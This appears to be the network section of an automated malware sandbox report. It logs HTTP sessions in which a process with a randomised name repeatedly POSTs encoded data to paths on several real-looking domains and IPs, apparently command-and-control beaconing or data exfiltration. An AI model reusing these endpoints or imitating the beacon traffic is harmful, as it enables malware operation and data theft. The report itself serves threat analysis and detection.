                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                May 28, 2024 07:17:07.266217947 CEST | 1236 | IN
                                Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                May 28, 2024 07:17:07.266230106 CEST | 1236 | IN
                                Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                May 28, 2024 07:17:07.266235113 CEST | 1236 | IN
                                Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                May 28, 2024 07:17:07.266241074 CEST | 1236 | IN
                                Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                May 28, 2024 07:17:07.266253948 CEST | 1236 | IN
                                Data Ascii: _id.rb:27:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `cal
                                May 28, 2024 07:17:07.266266108 CEST | 776 | IN
                                Data Ascii: 2:in `process_client&#39;</a><br><a class="trace-frames" data-frame-id="21" href="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:
                                May 28, 2024 07:17:07.266277075 CEST | 1236 | IN
                                Data Ascii: l_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">activesupport (5.2.6) lib/active_support/tagged_
                                May 28, 2024 07:17:07.266288996 CEST | 1236 | IN
                                Data Ascii: -id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="
                                May 28, 2024 07:17:07.266300917 CEST | 1236 | IN
                                Data Ascii: me-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <script type="text/javascript"> var traceFrames = document.getElementsByClassName('trace-frames'); var selec
                                May 28, 2024 07:17:07.271333933 CEST | 1132 | IN
                                Data Ascii: </h2> <p> Routes match in priority from top to bottom </p> <table id='route_table' class='route_table'> <thead> <tr> <th>Helper</th> <th>HTTP Verb</th> <th>Path</th> <th>Controller#Action</th>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                26 | 192.168.2.6 | 49738 | 216.40.34.41 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:09.283747911 CEST | 788 | OUT | POST /dkdj/ HTTP/1.1
                                Host: www.allgiftedmalaysia.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.allgiftedmalaysia.com
                                Referer: http://www.allgiftedmalaysia.com/dkdj/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=Z0k7L0IoGcir9O+FFeeK8dj6Gon4rvMmKrzcq8qfXkFvR6h9gOeyHWSXApgneIINoMaK3u7LrxMUwg1PoH4Ddck+BcYmhRHeOaUbHIZrdRL0PWXT96dn90FcanxTOD3rvWibLO9R/LBIDb4Jl3K73k4KLPT8QEu6r/oS2hasncaj/N05LHC0VMWNxROR0z+yvj40lUqq+Cl4vMUXovMVi2FU/Pndv9I8sA==
                                May 28, 2024 07:17:09.847301960 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                content-type: text/html; charset=UTF-8
                                x-request-id: 238e2ff7-599a-4fd4-bb3d-a9cf08aa8df5
                                x-runtime: 0.056269
                                content-length: 18278
                                connection: close
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                May 28, 2024 07:17:09.847424030 CEST | 1236 | IN
                                Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                May 28, 2024 07:17:09.847434998 CEST | 1236 | IN
                                Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                May 28, 2024 07:17:09.847445965 CEST | 672 | IN
                                Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                May 28, 2024 07:17:09.847455025 CEST | 1236 | IN
                                Data Ascii: amework Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Framework-Trace&#39;);show(&#39;Full-Trace&#39;);; return false;">Full Trace</a> <div id="Application-Trace" style="display: block;"> <pre><co
                                May 28, 2024 07:17:09.847465992 CEST | 1236 | IN
                                Data Ascii: (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">acti
                                May 28, 2024 07:17:09.847553968 CEST | 1236 | IN
                                Data Ascii: `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/user.rb:524:in `call&#39;</a><br>
                                May 28, 2024 07:17:09.847567081 CEST | 1236 | IN
                                Data Ascii: race-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a
                                May 28, 2024 07:17:09.847578049 CEST | 1236 | IN
                                Data Ascii: ="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">activesuppor
                                May 28, 2024 07:17:09.847744942 CEST | 1236 | IN
                                Data Ascii: ef="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <script type
                                May 28, 2024 07:17:09.855135918 CEST | 1236 | IN
                                Data Ascii: ); currentSource = el; } } } </script></div> <h2> Routes </h2> <p> Routes match in priority from top to bottom </p> <table id='route_table' class='route_table'> <thead>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                27 | 192.168.2.6 | 49739 | 216.40.34.41 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:11.813875914 CEST | 1801 | OUT | POST /dkdj/ HTTP/1.1
                                Host: www.allgiftedmalaysia.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.allgiftedmalaysia.com
                                Referer: http://www.allgiftedmalaysia.com/dkdj/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=Z0k7L0IoGcir9O+FFeeK8dj6Gon4rvMmKrzcq8qfXkNvRIp9hveyEWSXIJgieIIAoMDD3uHhr3IUwDNPt1ADTck+esYrlRHHObkfHIJrdRL0PU/Tpbdn70FfNXxfET3TvSGLLOpB/9xID6IJnFi7o04MKPSpQEifr/lr2heCneGju79NeX2SI8SqwDWsskeOoycz2Sa77SoVuYARj/5wn392hv2Br5BX4E6CEUfJCbg0tHnsqmCMwSjTgcyG6qS57mKqp9YAEnRfOOiOv3XvSK4VFu3iiNezO710Og8chPSRam9bt/kcF6lru438BGYX/w9L6MxFIDE5czGHUUP1l2lIXSnunGGF/qJrSs8HUKh4cFebmhTDCF1SWKMLKqoUFD286+LZUZHpFJiobRIuKZyi03VvQQrKTu79seTQh0KfXxhvNvUdUf+uFLoC/KKkjRiLSGq3CHN5kCGQBsFVEKLk8KXfbP2JGK/VZQK0k8sM6HUzXazrhr237wxndqSRWcnYHzYv6WtLM7gz0WZTce4xMxqwOkdwDVz1MQhZo1Jd8WK9pUYiegOT98adRhtXyUtZTBB1dYU6KC432DpFCAP7iWaD3eTtLituK5X7b//aox8WqZwxKEqk+D3hKU3I9sYaaYUmZtiMEKVr4aAVhD5k/J1fUl7LvjqeLN7Z2L9FjbwONI1W2jiSdjChBTUD8PIGyHDaT/yc03IJbFOpSN01VhRB95KIpn6VzRHdu43wllN1dgHxnmc0HRdcCGCS7xnRyPiUwVAmAMtPicfzY+vNd5ksnffJpfxxyOBd+X2SSNOV0dswwJz3MxmcsJvU1252MplgwxHCHsS8yBljFa9FQJfzz8ue8F4hSfSu9hisdGPd5XCtQDQP74NN7IyLwZNootczZFak82YECR1xXfDrljmUPBjVtxicZGx2mPf4x2bhz7YUKtBkvMRZbMGqE6Irsu61EW3zK6PqoZcg9+6qYFwqZSuByQfWMGmLOuKtAn [TRUNCATED]
                                May 28, 2024 07:17:12.337214947 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                content-type: text/html; charset=UTF-8
                                x-request-id: a8a9b9cd-96f7-44b8-b236-0f9927f5c434
                                x-runtime: 0.033622
                                content-length: 19290
                                connection: close
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                May 28, 2024 07:17:12.337229013 CEST | 224 | IN
                                Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source {
                                May 28, 2024 07:17:12.337244987 CEST | 1236 | IN
                                Data Ascii: border: 1px solid #D9D9D9; background: #ECECEC; width: 978px; } .source pre { padding: 10px 0px; border: none; } .source .data { font-size: 80%; overflow: auto; background-colo
                                May 28, 2024 07:17:12.337259054 CEST | 1236 | IN
                                Data Ascii: e: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table tbody tr:nth-child(odd) { background: #f2f2f2; } #route_table tbody.exact_matches, #route_table tbody.fuzzy_matches { background
                                May 28, 2024 07:17:12.337268114 CEST | 1236 | IN
                                Data Ascii: /header><div id="container"> <h2>No route matches [POST] &quot;/dkdj&quot;</h2> <p><code>Rails.root: /hover-parked</code></p><div id="traces"> <a href="#" onclick="hide(&#39;Framework-Trace&#39;);hide(&#39;Full-Trace&#39;);show(&#
                                May 28, 2024 07:17:12.337279081 CEST | 672 | IN
                                Data Ascii: data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `block in tagged&#39;</a>
                                May 28, 2024 07:17:12.337347031 CEST | 1236 | IN
                                Data Ascii: d="8" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/remote_ip.rb:81:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="tr
                                May 28, 2024 07:17:12.337357998 CEST | 1236 | IN
                                Data Ascii: `call&#39;</a><br><a class="trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/configuration.rb:228:in `call&#39;</a><br><a class="trace-frames" data-frame-id="19" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#
                                May 28, 2024 07:17:12.337368011 CEST | 1236 | IN
                                Data Ascii: ock in call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `block in tagged&#39;</a><br><a class="trace-frames" data-frame-id="5" href="#">activesupport (5.2.6) l
                                May 28, 2024 07:17:12.337378979 CEST | 1236 | IN
                                Data Ascii: ef="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="trace-frames" data-frame-id="14" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/executor.rb:14:in `call&#39;
                                May 28, 2024 07:17:12.342873096 CEST1236INData Raw: 69 76 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 76 61 72 20 74 72 61 63 65 46 72 61 6d 65 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42
                                Data Ascii: iv> <script type="text/javascript"> var traceFrames = document.getElementsByClassName('trace-frames'); var selectedFrame, currentSource = document.getElementById('frame-source-0'); // Add click listeners for all stack frames


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                28 | 192.168.2.6 | 49740 | 216.40.34.41 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:14.346158028 CEST | 485 | OUT | GET /dkdj/?5L0=2bCPy0&jTZPp=U2MbIDwYObql7+StDszk2IWvOqKP49Y4LLLXxrmKfStKROUY/qK9Zw3EJYAbIJoej5+11dDiuiwrzCxekQQ2SsNjLcEghxbMGsQSE4hdcQPQTWeOxMh44mhCIwJzKEDB4Xq2erE= HTTP/1.1
                                Host: www.allgiftedmalaysia.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:17:14.853478909 CEST | 1236 | IN | HTTP/1.1 200 OK
                                x-frame-options: SAMEORIGIN
                                x-xss-protection: 1; mode=block
                                x-content-type-options: nosniff
                                x-download-options: noopen
                                x-permitted-cross-domain-policies: none
                                referrer-policy: strict-origin-when-cross-origin
                                content-type: text/html; charset=utf-8
                                etag: W/"5a28beb34987a526f17f1fe74b6858c2"
                                cache-control: max-age=0, private, must-revalidate
                                x-request-id: 72698272-5488-4c38-b5ea-e5baffcc96a6
                                x-runtime: 0.006749
                                transfer-encoding: chunked
                                connection: close
                                Data Ascii: 17F7<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>allgiftedmalaysia.com is expired</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                29 | 192.168.2.6 | 49741 | 203.161.43.227 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:20.398274899 CEST | 737 | OUT | POST /05xu/ HTTP/1.1
                                Host: www.shortput.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.shortput.top
                                Referer: http://www.shortput.top/05xu/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=ccxtBLnFjmJeKOGaYdwRg41BJzmsBXlTKRDse2ipVFhmArCaGrBvYifWHeOYy8s9JMJ4inz8sZXwctMoEG6B11oJgT3BIgavL1jZ5um0iuUBg4dm01Nhx788cS18myxIK4Og9hkK+A5lsKpLImLJI/S3pCHlApRBggFuGsdBn3HBfatkxw4wXonsBL3aloA6F+EEyb7ZYkul
                                May 28, 2024 07:17:20.999479055 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:17:20 GMT
                                Server: Apache
                                Content-Length: 38381
                                Connection: close
                                Content-Type: text/html
                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                30 | 192.168.2.6 | 49742 | 203.161.43.227 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:22.933852911 CEST | 761 | OUT | POST /05xu/ HTTP/1.1
                                Host: www.shortput.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.shortput.top
                                Referer: http://www.shortput.top/05xu/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=ccxtBLnFjmJeLuWaeOIR3I1CFTmsUHlXKRPse0O5AgJmAKyaHu1vLSfWP+Od9cs2JMFail38sZDwct8oE0SC0loLoz3DCAavL1jZ5uaOiuMBgsZmyUNg3L8zVy18iyxMK4P19jAs+F9lsOtLIyXWC/SxkiH7Nb9Kt2MvINNS2W6gess+tD4TF4HuBJvolIAQH+8EgM3+XQLGIkfsFfszYU50PbFH+I6/1Q==
                                May 28, 2024 07:17:23.545088053 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:17:23 GMT
                                Server: Apache
                                Content-Length: 38381
                                Connection: close
                                Content-Type: text/html


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                31 | 192.168.2.6 | 49743 | 203.161.43.227 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:25.470640898 CEST | 1774 | OUT | POST /05xu/ HTTP/1.1
                                Host: www.shortput.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.shortput.top
                                Referer: http://www.shortput.top/05xu/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp= [TRUNCATED]
                                May 28, 2024 07:17:26.075145006 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:17:25 GMT
                                Server: Apache
                                Content-Length: 38381
                                Connection: close
                                Content-Type: text/html


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                32 | 192.168.2.6 | 49744 | 203.161.43.227 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:28.022160053 CEST | 476 | OUT | GET /05xu/?jTZPp=ReZNC8TX9gJaOIK/BvITh+0FGwzFHm92bQvbNg62F2J0R8z5SuhCGDe2HN2Byu0BC7BKvHjRxIjSR8MFICml92wEl2DsCCajGT/6l7iIm8MBifF7wDoE5bE7ZGx4kkh6K6rbsW4=&5L0=2bCPy0 HTTP/1.1
                                Host: www.shortput.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:17:28.626703978 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:17:28 GMT
                                Server: Apache
                                Content-Length: 38381
                                Connection: close
                                Content-Type: text/html; charset=utf-8


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                33 | 192.168.2.6 | 49745 | 185.229.21.229 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:33.834487915 CEST | 752 | OUT | POST /zzbw/ HTTP/1.1
                                Host: www.cuddle-paws.co.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.cuddle-paws.co.uk
                                Referer: http://www.cuddle-paws.co.uk/zzbw/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=faYf+Jwiw1zyLGhY2r2S9b/RfLorze3l+BlwZSA/J3OCtN2SGtPRCKz0M1nzT+mfRcmNbtftXZAVibXOonhOyrUyO0YCAgpJdVYqctv5PuuX3Hb2y6Ge6Jv9vvo81hRp9t3VGmyGXUuYvYx2iw3gdoyASvp6TxmYTwUdDhR7z16KzTHunaN+rj9d42GWmuHYPWeTVrYkBrVF
                                May 28, 2024 07:17:34.453079939 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:17:34 GMT
                                Server: Apache
                                Content-Length: 315
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                34 | 192.168.2.6 | 49746 | 185.229.21.229 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:36.363867044 CEST | 776 | OUT | POST /zzbw/ HTTP/1.1
                                Host: www.cuddle-paws.co.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.cuddle-paws.co.uk
                                Referer: http://www.cuddle-paws.co.uk/zzbw/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=faYf+Jwiw1zyEHRYlYOSqL/SVrorlu3h+BpwZTV0JlqCtp6SUo7RFKz0UFn2eemqRcr+bsjtXZ8Vie7OoUJJ9bUwS0YANApJdVYqctLDPuGX30D2zbGBk5v8ovo8xhQi9t3zGneoXRqYvZt2ih3jUoyGP/omTCDBLQpSCm9My0urylG07pNd5zdf40ekmOHyNWmTH8UDOfwm0x58BvHgvkvH9g6svSWk2w==
                                May 28, 2024 07:17:36.974198103 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:17:36 GMT
                                Server: Apache
                                Content-Length: 315
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
